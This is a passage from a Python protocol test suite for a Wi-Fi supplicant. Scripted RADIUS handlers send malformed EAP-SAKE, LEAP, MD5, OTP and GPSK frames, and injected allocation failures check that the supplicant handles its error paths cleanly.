time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
"""EAP-SAKE local error cases"""
check_eap_capa(dev[0], "SAKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_sake_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ ( 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge" ),
( 1, "=eap_sake_process_challenge" ),
( 1, "eap_sake_compute_mic;eap_sake_process_challenge" ),
( 1, "eap_sake_build_msg;eap_sake_process_confirm" ),
( 1, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 2, "eap_sake_compute_mic;eap_sake_process_confirm" ),
( 1, "eap_sake_getKey" ),
( 1, "eap_sake_get_emsk" ),
( 1, "eap_sake_get_session_id" ) ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
"""EAP-SAKE protocol tests (2)"""
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
check_eap_capa(dev[0], "LEAP")
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_leap_errors(dev, apdev):
    """EAP-LEAP protocol tests (error paths)"""
    check_eap_capa(dev[0], "LEAP")
    def leap_handler2(ctx, req):
        # Scripted RADIUS EAP handler: ctx['num'] counts received EAP
        # messages and selects the reply for each step; ctx['id'] tracks
        # the EAP identifier (wraps at 256).
        # NOTE: req.encode("hex") is the Python 2 hex codec.
        logger.info("leap_handler2 - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is incremented before each comparison so steps can be
        # inserted/removed without renumbering every branch.
        idx = 0
        # Steps 1-2: challenge followed by immediate EAP-Failure; the
        # local failure cases in the test body below are triggered while
        # the peer processes these scripted exchanges.
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        # Remaining steps: repeated challenge/response pairs. The 24-byte
        # response payload is a fixed value reused for every pair.
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challenge")
            return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 8,
                               EAP_TYPE_LEAP,
                               1, 0, 8, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid challange value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        # Default: terminate any remaining exchange with EAP-Failure.
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(leap_handler2)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each with-block forces one specific local allocation/crypto
        # failure inside the EAP-LEAP implementation and verifies the
        # supplicant survives it (no crash; clean disconnect).
        with alloc_fail(dev[0], 1, "eap_leap_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_leap_process_request"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user",
                           password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with alloc_fail(dev[0], 1, "eap_leap_process_success"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "os_get_random;eap_leap_process_success"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "eap_leap_process_response"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user",
                           password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "nt_password_hash;eap_leap_process_response"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_process_response"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with alloc_fail(dev[0], 1, "eap_leap_getKey"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user",
                           password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "eap_leap_getKey"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user",
                           password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "nt_password_hash;eap_leap_getKey"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
        with fail_test(dev[0], 1, "hash_nt_password_hash;eap_leap_getKey"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    finally:
        stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
    """EAP-MD5 protocol tests"""
    check_eap_capa(dev[0], "MD5")

    def md5_handler(ctx, req):
        # Scripted responder: reply depends only on how many EAP messages
        # have been received so far (ctx['num']).
        logger.info("md5_handler - RX " + req.encode("hex"))
        ctx['num'] = ctx.get('num', 0) + 1
        ctx['id'] = (ctx.get('id', 1) + 1) % 256
        step = ctx['num']
        if step == 1:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
                               EAP_TYPE_MD5)
        elif step == 2:
            logger.info("Test: Zero-length challenge")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1, EAP_TYPE_MD5, 0)
        elif step == 3:
            logger.info("Test: Truncated challenge")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1, EAP_TYPE_MD5, 1)
        elif step == 4:
            logger.info("Test: Shortest possible challenge and name")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3, EAP_TYPE_MD5, 1, 0xaa, ord('n'))
        return None

    srv = start_radius_server(md5_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One association attempt per scripted handler step.
        for _ in range(4):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MD5", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
    """EAP-MD5 local error cases"""
    check_eap_capa(dev[0], "MD5")
    ap_params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], ap_params)

    def start_md5_conn():
        # Start an EAP-MD5 association and wait for the method to begin.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="phase1-user", password="password",
                       wait_connect=False)
        event = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
        if event is None:
            raise Exception("Timeout on EAP start")

    # Force a failure inside the CHAP-MD5 computation.
    with fail_test(dev[0], 1, "chap_md5"):
        start_md5_conn()
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Force an allocation failure while building the MD5 response.
    with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
        start_md5_conn()
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
    """EAP-OTP protocol tests"""
    def otp_handler(ctx, req):
        # Scripted responder: ctx['num'] counts received EAP messages and
        # selects the reply; ctx['id'] tracks the EAP identifier.
        logger.info("otp_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Empty payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_OTP)
        if ctx['num'] == 2:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        if ctx['num'] == 3:
            logger.info("Test: Challenge included")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_OTP,
                               ord('A'))
        if ctx['num'] == 4:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        return None
    srv = start_radius_server(otp_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        for i in range(0, 1):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="OTP", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")

        # Second attempt: no password configured, so wpa_supplicant must
        # request the OTP via a control-interface CTRL-REQ-OTP prompt.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="OTP", identity="user", wait_connect=False)
        ev = dev[0].wait_event(["CTRL-REQ-OTP"])
        if ev is None:
            raise Exception("Request for password timed out")
        id = ev.split(':')[0].split('-')[-1]
        dev[0].request("CTRL-RSP-OTP-" + id + ":password")
        # BUG FIX: wait_event() expects a list of event prefixes. Passing a
        # bare string made it iterate over single characters, so nearly any
        # event would have matched and the success check was ineffective.
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"])
        if ev is None:
            raise Exception("Success not reported")
    finally:
        stop_radius_server(srv)
def test_eap_proto_otp_errors(dev, apdev):
    """EAP-OTP local error cases"""
    def otp_handler2(ctx, req):
        # Scripted responder: first message gets an OTP challenge, anything
        # after that gets EAP-Failure.
        logger.info("otp_handler2 - RX " + req.encode("hex"))
        ctx['num'] = ctx.get('num', 0) + 1
        ctx['id'] = (ctx.get('id', 1) + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Challenge included")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1, EAP_TYPE_OTP, ord('A'))
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    srv = start_radius_server(otp_handler2)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Force an allocation failure while building the OTP response.
        with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_otp_process"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="OTP", identity="user", password="password",
                           wait_connect=False)
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    finally:
        stop_radius_server(srv)
# EAP-GPSK message opcodes (RFC 5433)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
    """EAP-GPSK protocol tests"""
    def gpsk_handler(ctx, req):
        # Scripted RADIUS EAP handler: ctx['num'] counts received EAP
        # messages and selects the scripted reply; ctx['id'] tracks the
        # EAP identifier. idx is incremented before each comparison so
        # steps can be inserted/removed without renumbering.
        # NOTE: req.encode("hex") is the Python 2 hex codec.
        logger.info("gpsk_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_GPSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown opcode")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Too short GPSK-1")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated ID_Server")
